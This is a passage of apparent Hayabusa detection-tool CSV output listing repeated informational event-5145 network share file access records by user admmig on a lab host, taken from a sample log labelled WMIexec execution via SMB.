+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 